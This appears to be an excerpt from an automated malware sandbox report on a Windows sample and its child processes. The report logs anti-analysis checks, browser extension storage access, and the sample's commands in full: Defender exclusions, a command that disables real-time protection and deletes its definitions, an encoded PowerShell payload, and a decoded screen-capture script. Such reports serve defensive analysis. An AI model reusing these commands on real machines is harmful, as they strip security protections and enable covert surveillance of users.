                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\cscript.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.2015669562.000002227B791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                                  Source: s.exe, 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RcF33KCGtqeMuNK3lOt
                                  Source: Build.exe, 0000000D.00000002.1791336805.0000000004F62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1719021432.0000000001BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                                  Source: based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWject%SystemRoot%\system32\mswsock.dll
                                  Source: s.exe, 00000015.00000002.1932745064.0000000005330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: based.exe, 00000011.00000003.2130901869.000002A15E176000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2130901869.000002A15E16D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeAPI call chain: ExitProcess graph end nodegraph_13-26162
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\ProgramData\svchost.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72B05C44C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6A640 mov eax, dword ptr fs:[00000030h]13_2_00B6A640
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_00577DEE mov eax, dword ptr fs:[00000030h]21_2_00577DEE
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_00687DEE mov eax, dword ptr fs:[00000030h]29_2_00687DEE
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B072790 GetProcessHeap,5_2_00007FF72B072790
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\cscript.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\cscript.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72B05C44C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF72B05BBC0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B069924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72B069924
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05C62C SetUnhandledExceptionFilter,5_2_00007FF72B05C62C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF72B05C44C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B05BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF72B05BBC0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B069924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF72B069924
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B05C62C SetUnhandledExceptionFilter,7_2_00007FF72B05C62C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FFE0C0C004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FFE0C0C004C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6215D SetUnhandledExceptionFilter,13_2_00B6215D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B612D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00B612D7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00B6647F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B61FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00B61FCA
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55DC67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF6D55DC67C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55DBDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF6D55DBDE0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55DC860 SetUnhandledExceptionFilter,15_2_00007FF6D55DC860
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55EACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF6D55EACD8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 18_2_00007FFE0122004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FFE0122004C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0056F838
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056F9D5 SetUnhandledExceptionFilter,21_2_0056F9D5
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0056FBCA
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_00578EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00578EBD
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0067F838
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067F9D5 SetUnhandledExceptionFilter,29_2_0067F9D5
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0067FBCA
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_00688EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00688EBD
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B27D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0000023225B27D90
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0000023225B2D2A4
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000016716C6D2A4
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000016716C67D90
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E891D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000245E891D2A4
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E8917D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000245E8917D90
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: Base64 decoded <#iij#>Add-Type -AssemblyName System.Windows.Forms;<#rrp#>[System.Windows.Forms.MessageBox]::Show('error: expected '';'' before ''return''','','OK','Error')<#hzy#>
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: Base64 decoded <#ddm#>Add-MpPreference <#uki#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#anb#> -Force <#yly#>
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: Base64 decoded <#iij#>Add-Type -AssemblyName System.Windows.Forms;<#rrp#>[System.Windows.Forms.MessageBox]::Show('error: expected '';'' before ''return''','','OK','Error')<#hzy#>Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: Base64 decoded <#ddm#>Add-MpPreference <#uki#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#anb#> -Force <#yly#>Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\Users\user\cscript.exeNtEnumerateKey: Indirect: 0x2AD2842
                                  Source: C:\Users\user\cscript.exeNtEnumerateKey: Indirect: 0x2AD2875
                                  Source: C:\Users\user\cscript.exeNtEnumerateValueKey: Indirect: 0x123293D
                                  Source: C:\Users\user\cscript.exeNtDeviceIoControlFile: Indirect: 0x1232B9D
                                  Source: C:\Users\user\cscript.exeNtEnumerateValueKey: Indirect: 0x123290E
                                  Source: C:\Users\user\cscript.exeNtDeviceIoControlFile: Indirect: 0x2AD2B9D
                                  Source: C:\Users\user\cscript.exeNtEnumerateValueKey: Indirect: 0x2AD290E
                                  Source: C:\Users\user\cscript.exeNtResumeThread: Indirect: 0x2AD231E
                                  Source: C:\Users\user\cscript.exeNtEnumerateValueKey: Indirect: 0x2AD293D
                                  Source: C:\Users\user\cscript.exeNtQuerySystemInformation: Indirect: 0x123205D
                                  Source: C:\ProgramData\setup.exeNtQuerySystemInformation: Direct from: 0x7FF7994742AE
                                  Source: C:\Users\user\cscript.exeNtQuerySystemInformation: Indirect: 0x2AD205D
                                  Source: C:\Users\user\cscript.exeNtEnumerateKey: Indirect: 0x1232842
                                  Source: C:\Users\user\cscript.exeNtEnumerateKey: Indirect: 0x1232875
                                  Source: C:\ProgramData\setup.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
